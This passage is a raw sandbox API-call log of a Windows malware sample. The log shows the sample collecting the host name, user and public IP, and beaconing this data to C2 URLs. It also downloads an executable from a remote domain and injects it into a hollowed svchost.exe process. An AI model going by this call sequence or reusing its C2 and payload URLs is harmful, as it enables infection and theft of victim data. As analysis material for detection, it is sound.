[59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x116cc217, FirstDnsSuffix=0x0), SizePointer=0x1ae3d4*=0x8000) returned 0x0 [0140.897] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x41c198 | out: hHeap=0x370000) returned 1 [0140.897] GetWindowsDirectoryA (in: lpBuffer=0x1ae2a0, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0140.897] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1ae3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1ae3a4*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.899] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0140.900] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0140.900] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0140.900] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0140.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0140.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0140.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0140.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0140.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x1b8 [0140.905] K32GetProcessImageFileNameA (in: hProcess=0x1b8, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0140.905] CloseHandle (hObject=0x1b8) returned 1 [0140.905] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0140.905] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0140.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x1b8 [0140.905] K32GetProcessImageFileNameA (in: hProcess=0x1b8, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0140.905] CloseHandle (hObject=0x1b8) returned 1 [0140.906] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0140.906] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0140.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x1b8 [0140.906] OpenProcessToken (in: ProcessHandle=0x1b8, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x1b0) returned 1 [0140.906] GetTokenInformation (in: TokenHandle=0x1b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0140.906] GetLastError () returned 0x7a [0140.906] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3fa6e0 [0140.906] GetTokenInformation (in: TokenHandle=0x1b0, TokenInformationClass=0x1, TokenInformation=0x3fa6e0, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3fa6e0, ReturnLength=0x1adf94) returned 1 [0140.906] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3fa6e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0140.908] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3fa6e0 | out: hHeap=0x370000) returned 1 [0140.908] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0140.908] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0140.908] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0140.908] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0140.908] InternetCrackUrlA (lpszUrl="http://api.ipify.org", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae35c) [0141.231] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0141.232] InternetConnectA (hInternet=0xcc0004, lpszServerName="api.ipify.org", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0141.233] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277050*="*/*", dwFlags=0x84080100, dwContext=0x1) returned 0xcc000c [0141.236] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0142.783] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3a8, lpdwBufferLength=0x1ae39c, lpdwIndex=0x0 | out: lpBuffer=0x1ae3a8*, lpdwBufferLength=0x1ae39c*=0x4, lpdwIndex=0x0) returned 1 [0142.783] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x277280, dwNumberOfBytesToRead=0x20, lpdwNumberOfBytesRead=0x1ae3bc | out: lpBuffer=0x277280*, lpdwNumberOfBytesRead=0x1ae3bc*=0xc) returned 1 [0142.783] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x27728c, dwNumberOfBytesToRead=0x14, lpdwNumberOfBytesRead=0x1ae3bc | out: lpBuffer=0x27728c*, lpdwNumberOfBytesRead=0x1ae3bc*=0x0) returned 1 [0142.783] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0142.783] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0142.783] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0142.783] DsEnumerateDomainTrustsA () returned 0x6b5 [0142.790] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0142.791] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0142.791] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0142.791] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2000) returned 0x43ef68 [0142.791] CryptAcquireContextA (in: phProv=0x1ae3ac, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1ae3ac*=0x3d5850) returned 1 [0142.829] CryptCreateHash (in: hProv=0x3d5850, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1ae3b0 | out: phHash=0x1ae3b0) returned 1 [0142.830] CryptHashData (hHash=0x3ea0c8, pbData=0x275010, dwDataLen=0x8, dwFlags=0x0) returned 1 [0142.830] CryptDeriveKey (in: hProv=0x3d5850, Algid=0x6801, hBaseData=0x3ea0c8, dwFlags=0x280011, phKey=0x1ae3a8 | out: phKey=0x1ae3a8*=0x3ea088) returned 1 [0142.830] CryptDecrypt (in: hKey=0x3ea088, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43ef68, pdwDataLen=0x1ae3c0 | out: pbData=0x43ef68, pdwDataLen=0x1ae3c0) returned 1 [0142.831] CryptDestroyHash (hHash=0x3ea0c8) returned 1 [0142.831] CryptDestroyKey (hKey=0x3ea088) returned 1 [0142.831] CryptReleaseContext (hProv=0x3d5850, dwFlags=0x0) returned 1 [0142.831] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0142.831] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x400) returned 0x441208 [0142.831] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0142.831] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0142.831] InternetCrackUrlA (in: lpszUrl="http://thowerteigime.com/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0142.831] InternetConnectA (hInternet=0xcc0004, lpszServerName="thowerteigime.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0142.832] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0142.832] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 0 [0163.908] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0163.908] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0163.908] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0163.908] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0163.908] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0163.908] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0163.908] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0163.908] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0164.058] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0164.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0x34) returned 1 [0164.058] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0164.058] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0164.058] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x500000) returned 0x2c40020 [0164.059] InternetCrackUrlA (in: lpszUrl="http://gromber6.ru/6hjusfd8.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1afa78 | out: lpUrlComponents=0x1afa78) returned 1 [0164.059] InternetConnectA (hInternet=0xcc0004, lpszServerName="gromber6.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0164.059] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/6hjusfd8.exe", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277050*="*/*", dwFlags=0x84080100, dwContext=0x1) returned 0xcc000c [0164.059] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0164.140] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1afac4, lpdwBufferLength=0x1afab8, lpdwIndex=0x0 | out: lpBuffer=0x1afac4*, lpdwBufferLength=0x1afab8*=0x4, lpdwIndex=0x0) returned 1 [0164.140] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2c40020, dwNumberOfBytesToRead=0x500000, lpdwNumberOfBytesRead=0x1afad8 | out: lpBuffer=0x2c40020*, lpdwNumberOfBytesRead=0x1afad8*=0x42c0e) returned 1 [0164.225] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2c82c2e, dwNumberOfBytesToRead=0x4bd3f2, lpdwNumberOfBytesRead=0x1afad8 | out: lpBuffer=0x2c82c2e*, lpdwNumberOfBytesRead=0x1afad8*=0x0) returned 1 [0164.225] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0164.225] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0164.225] GetEnvironmentVariableA (in: lpName="SystemRoot", lpBuffer=0x1afb88, nSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0164.225] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\System32\\svchost.exe" | out: lpString1="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0164.225] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\System32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x424, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1afc8c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1afcd0 | out: lpCommandLine="C:\\Windows\\System32\\svchost.exe", lpProcessInformation=0x1afcd0*(hProcess=0x330, hThread=0x328, dwProcessId=0xb24, dwThreadId=0xb28)) returned 1 [0164.533] VirtualAllocEx (hProcess=0x330, lpAddress=0x400000, dwSize=0x48000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0164.536] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48000) returned 0x3150048 [0164.543] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x400000, lpBuffer=0x3150048*, nSize=0x48000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3150048*, lpNumberOfBytesWritten=0x0) returned 1 [0164.560] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3150048 | out: hHeap=0x370000) returned 1 [0164.561] GetThreadContext (in: hThread=0x328, lpContext=0x1afa0c | out: lpContext=0x1afa0c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0xc02104, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, 